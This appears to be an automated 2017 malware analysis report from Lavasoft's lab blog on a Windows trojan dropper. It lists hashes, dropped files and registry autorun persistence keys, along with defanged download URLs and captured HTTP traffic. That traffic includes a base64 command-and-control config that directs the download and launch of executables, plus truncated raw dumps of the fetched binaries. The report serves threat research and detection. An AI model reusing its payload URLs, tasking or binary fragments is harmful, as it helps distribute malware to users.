Sample_a4e3362c71

HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Trojan The description has been automatically generated by Lavasoft Malware Analysis System and it may contain...
Blog rating:1 out of5 with3 ratings

Sample_a4e3362c71

by malwarelabrobot on September 6th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a4e3362c71547941a74d03b270b46e81
SHA1: 62b51f2fdd6799643d9164bd4b6ff6980cd9563c
SHA256: ba4b897f00b1e502f36120cd3911e3e732fb558f249ce4255cfdc13ddb76cb44
SSDeep: 24576:srFYHdwVDIfQE3EpM6u7MTqrpH9jc4FbA5WZ04xDrNzJFYE1AvaQp86Xo0L0nCy6:fy7Y9H9j/k580IDV5VrGxvNX2
Size: 2155520 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Kobit
Created at: 2017-08-21 06:20:48
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

SecondL.exe:3664
cKgIbDKpjiaF3kq96ZCB.exe:796
Sho9libi.exe:3876
%original file name%.exe:1900

The Trojan injects its code into the following process(es):

cKgIbDKpjiaF3kq96ZCB.exe:2176
kc2zt4jv2nb.exe:2748
cKgIbDKpji.exe:600

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SecondL.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe (204 bytes)

The process cKgIbDKpjiaF3kq96ZCB.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe (227430 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe (400 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe.config (1 bytes)

The process Sho9libi.exe:3876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3876.434181 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3876.434181 (0 bytes)

The process %original file name%.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe (54882 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe (19522 bytes)

The process cKgIbDKpji.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (36 bytes)

Registry activity

The process SecondL.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process cKgIbDKpjiaF3kq96ZCB.exe:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process cKgIbDKpjiaF3kq96ZCB.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpjiaF3kq96ZCB_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_PMJXG" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Sho9libi.exe:3876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

The process %original file name%.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "05/09/2017"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\a4e3362c71547941a74d03b270b46e81_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process kc2zt4jv2nb.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"0dlt4xjqyxw" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe"

The process cKgIbDKpji.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cKgIbDKpji_RASAPI32]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CGXYQCF886G0GDX" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe"

Dropped PE files

MD5 File path
7005973f1462edbf5f1986f5ccd2fe99 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe
f7f76a1d4a5978dece064147e1c6fe53 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe
755a66c5d1e7c178f070d11ac0fac010 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe
9adb4086f9d342fb48483ed2c5a22c46 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe
251952fc1f613e50fa43e7c49d395df5 c:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: B
Product Name: B
Product Version: 0.1.2.0
Legal Copyright: Copyright (c) 6920
Legal Trademarks:
Original Filename: E3443.exe
Internal Name: E3443.exe
File Version: 0.1.2.0
File Description: B
Comments: BG
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 2149872 2149888 4.16598 bf78ca826c09fb7e35cfdf6770343b3c
.rsrc 2162688 4404 4608 3.47994 e31f743409850d4761eb25d76215bf57
.reloc 2170880 12 512 0.070639 1a267295e843ca20c95c7f167f73ca04

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://bratitlamio.com/get/4/remote.exe 94.23.199.17
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 94.23.44.92
hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe 94.23.199.17
hxxp://bratitlamio.com/exe/updater.exe 94.23.199.17
hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe 94.23.199.17
hxxp://bratitlamio.com/get/3/wizzcaster_v2.exe 94.23.199.17
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load 176.31.252.74
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok 176.31.252.74
hxxp://ladomainadeserver.com/api/v5/config 94.23.44.92
hxxp://ladomainadeserver.com/api/v5/link 94.23.44.92


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_
channel_name=1

HTTP/1.1 200 OK


Date: Mon, 04 Sep 2017 23:16:23 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=lm9u20570ksvenj4q382ksgsp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1076
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA5MDUiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDkwNSIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJTaG85bGliaS
IgdmFsdWU9Imh0dHA6Ly9icmF0aXRsYW1pby5jb20vZXhlL3VwZGF0ZXIuZXhlIiB2ZXJz
aW9uPSIiICBzb2Z0d2FyZT0iIiBuZXQ9InllcyIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YX
J0IiBuYW1lPSJTaG85bGliaSIgdmFsdWU9IndhaXQiIHBhcmFtcz0id2UiLz4NCjxtb2Qg
dHlwZT0iYWRkIiBuYW1lPSJEYXRlIiB2YWx1ZT0iZmU4ZjE3MDkwNSIvPg0KDQo8L3Blcm
Zvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJEYXRl
IiB2YWx1ZT0iMTcwOTA1IiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC
90YXNrPgo8L3VwZGF0ZXM CgoK..



POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK


Date: Mon, 04 Sep 2017 23:17:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=8f3168b99e0e8abb03a6e76bcb1542eefdf7924f; expires=Tue, 05-Sep-2017 01:17:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Mon, 04 Sep 2017 23
:17:40 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=8f3168b99e0e8abb03a6e76bcb1542eefdf7924f; e
xpires=Tue, 05-Sep-2017 01:17:40 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....




uid=57a764d042bf8

HTTP/1.1 200 OK


Date: Mon, 04 Sep 2017 23:17:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=8df5f4a8016108a3dc92ca1df3b2daab6027bf24; expires=Tue, 05-Sep-2017 01:17:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Mon, 04 Sep 2017 23:17:40 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=8df5f
4a8016108a3dc92ca1df3b2daab6027bf24; expires=Tue, 05-Sep-2017 01:17:40
 GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=UTF-8..{"link":"http:\/\/ladomainadeserver.com\/r
edirect\/57a764d042bf8"}..



GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:26 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..W@.Y.........."...0.............R=... ...@....@.. ..................
..................@..................................=..O....@..\.....
...............`.......;..............................................
. ............... ..H............text...X.... ...................... .
.`.rsrc...\....@....... ..............@..@.reloc.......`.......(......
........@..B................4=......H........#..H............;........
.......................................0..%.............(....(....r...
pr...po....(......(....&.(....r...pr...po....r...p(....(........ T....
. ..........,........ #.....3..... ......,......X......X.... X........
.-.....X.... ..........-.... ...... ..........,.........X.... ........
..-..(.....(...........%.r...p.%.ra..p.%.r...p.%.r...p.%.rG..p.%.r[..p
.%.rB..p.%.rR..p.%.r...p.%..r...p.%..rQ..p.%..r...p.%..r...p.%..r:..p.
%..r...p.%..r...p.%..r...p.%..r9..p.%..rQ..p.%..r...p.%..r...p.%..r...
p.%..r...p.%..r...p.%..r...p.%..r...p.(.......r...p(......(...........
...,.....(....& ..r...p(....&.........*...A...........................
.0..f........r...p.r!..p... ".. ..........,...r7..p(.........X.. .....
.....-.s.......rG..p(....s.....o.....r...p.*".( ....*&.( .....*....0..
9........~.........,".r...p.....(!...o"...s#...........~..... ..*....0
...........~..... ..*".......*.0...........~..... ..*".($....*Vs....(%
...t.........*..BSJB............v2.0.50727......l...$...#~......`.
<<< skipped >>>

GET /exe/updater.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:26 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
228c00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......Y.........."...0...!.........Z !.. ...@!...@.. ................
........#...........@.................................. !.O....@!. ...
..................".......!...........................................
... ............... ..H............text...`.!.. ....!.................
 ..`.rsrc... ....@!.......!.............@..@.reloc........"......."...
..........@..B................< !.....H........!.............../...
. ..........................................0..........(....(.....~...
.(.....~....(.....(......o........io.....(.....o....(....(........o...
.r...po.......o....t#..........%...o....&..&..*.................0..3..
.....(....~....o......s....%o .....o!...o".......&.....*.........,,...
....0..........s#......&.....*.................~r...p.....rY..p.....rs
..p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*..
.....*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727.
.....l...\...#~..........#Strings............#US.h.......#GUID...x...d
...#Blob...........W..........3........(...................)..........
.........................................4...........h.s..............
...................T.....m.................&...........F.M.....M......
.....M...>.......u...4.>...K.s...........................|......
.....Y.M...T.u...g.u.....a.....M.................................f.M..
.......................E...=.............=.........!...q.......r..
<<< skipped >>>


GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:24 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
fe200..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...<..Y.........."...0.............r.... ........@.. ..............
.........@............@................................. ...O.........
................... ..................................................
..... ............... ..H............text...x.... ....................
.. ..`.rsrc...............................@..@.reloc....... ..........
............@..B................T.......H........!.............../.. .
...........................................0..........(....(.....~....
(.....~....(.....(......o........io.....(.....o....(....(........o....
r...po.......o....t#..........%...o....&..&..*.................0..3...
....(....~....o......s....%o .....o!...o".......&.....*.........,,....
...0..........s#......&.....*.................~r...p.....rY..p.....rs.
.p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*...
....*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727..
....l...\...#~..........#Strings............#US.h.......#GUID...x...\.
..#Blob...........W..........3........(...................)...........
........................................4...........h.s...............
..................T.....m.................&...........F.M.....M.......
....M...>.......u...4.>...K.s...........................|.......
....Y.M...T.u...g.u.....a.....M.................................f.M...
......................E...=.............=.........!...q.......r...
<<< skipped >>>


GET /get/4/remote.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:21 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
24000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Y.........."...0.................. ........@.. .................
...................@.................................`...O....... ....
.......................(..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc... ...........................@..@.reloc...............>..
............@..B........................H........!.............../..X.
...........................................0..........(....(.....~....
(.....~....(.....(......o........io.....(.....o....(....(........o....
r...po.......o....t#..........%...o....&..&..*.................0..3...
....(....~....o......s....%o .....o!...o".......&.....*.........,,....
...0..........s#......&.....*.................~r...p.....rY..p.....rs.
.p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*...
....*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727..
....l...\...#~..........#Strings............#US.h.......#GUID...x...d.
..#Blob...........W..........3........(...................)...........
........................................4...........h.s...............
..................T.....m.................&...........F.M.....M.......
....M...>.......u...4.>...K.s...........................|.......
....Y.M...T.u...g.u.....a.....M.................................f.M...
......................E...=.............=.........!...q.......r...
<<< skipped >>>


GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 23:16:29 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..dB.Y.........."...0.............f2... ...@....@.. ..................
..................@..................................2..O....@..\.....
...............`.......0..............................................
. ............... ..H............text...l.... ...................... .
.`.rsrc...\....@......................@..@.reloc.......`..............
........@..B................H2......H.......("..............$0........
.......................................0............s............,N.~.
...r...p.o......(....r]..pra..po....rc..p(....o....rc..p(....o......o.
..... Z.rg..p(.............,...........,.. `......o....Z(......rq..p(.
...&. `.......o....Z(......... .&....*...................0..4........r
...p..rg..p( .....,...r...p(!...("........ ... ..*".(#....*&.(#.....*.
.0..9........~.........,".r...p.....($...o%...s&...........~..... ..*.
...0...........~..... ..*".......*.0...........~..... ..*".('....*Vs..
..((...t.........*..BSJB............v2.0.50727......l...$...#~........
..#Strings........P...#US.d.......#GUID...t.......#Blob...........W...
.......3........$...................(.................................
..............>.?.....?...r.................!.................^....
.w............. ...0. ...........D.....D...K.D...E.......D...>.....
U.......?....._...........&.....&.....p...o.....!.......D...f.....-...
..........D...Y.D.....p...................<...=.............=..
<<< skipped >>>


POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 04 Sep 2017 23:16:32 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=7n4hpe131o2lnmdpqo6jhqirh5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 04 Sep 







The Trojan connects to the servers at the folowing location(s):







cKgIbDKpji.exe_600_rwx_002A2000_00002000:




0 4   $ 






Remove it with Ad-Aware




    

